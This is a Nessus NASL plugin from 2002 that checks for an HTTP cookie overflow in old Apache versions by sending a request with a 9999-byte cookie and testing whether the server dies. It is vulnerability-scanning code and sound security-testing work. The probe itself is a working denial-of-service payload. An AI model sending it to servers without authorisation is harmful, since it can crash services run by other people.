#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# References:

# Affected:
# Apache < 1.1
# 


if(description)
{
 script_id(11077);
 script_version ("$Revision: 1.3 $");
 name["english"] = "HTTP Cookie overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "It was possible to kill the web server by
sending an invalid request with a too long Cookie name or value

A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.

Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Too big Cookie chokes the web server";
 script_summary(english:summary["english"]);
 
 script_category(ACT_MIXED_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_require_ports("Services/www", 80);
 exit(0);
}

########

include ("http_func.inc");

if (safe_checks()) exit(0);

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
if (http_is_dead(port: port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

# If the server sends us a cookie, we will reply with it... 
# Slightly modified :-)
r = http_get(item:"/", port: port);
send(socket:soc, data: r);
h = http_recv_headers(soc);
r = recv(socket: soc, length:4096);
close(soc);

ck = egrep(pattern: "^Set-Cookie: ", string: h);

ckn="Nessus";
if (ck)
{
  ckn = ereg_replace(string: ck, 
	pattern: "^Set-Cookie: +([^=;]+)=.*", 
	replace:"\1");
}

soc = open_sock_tcp(port);
if(!soc) exit(0);

r = http_get(item:"/", port: port);
r= r - string("\r\n\r\n");
r= string(r, "\r\n", "Cookie: ", ckn, "=", crap(9999), "\r\n\r\n");

send(socket:soc, data: r);
r = recv(socket: soc, length:4096);
close(soc);

if (http_is_dead(port: port)) { security_hole(port); exit(0); }
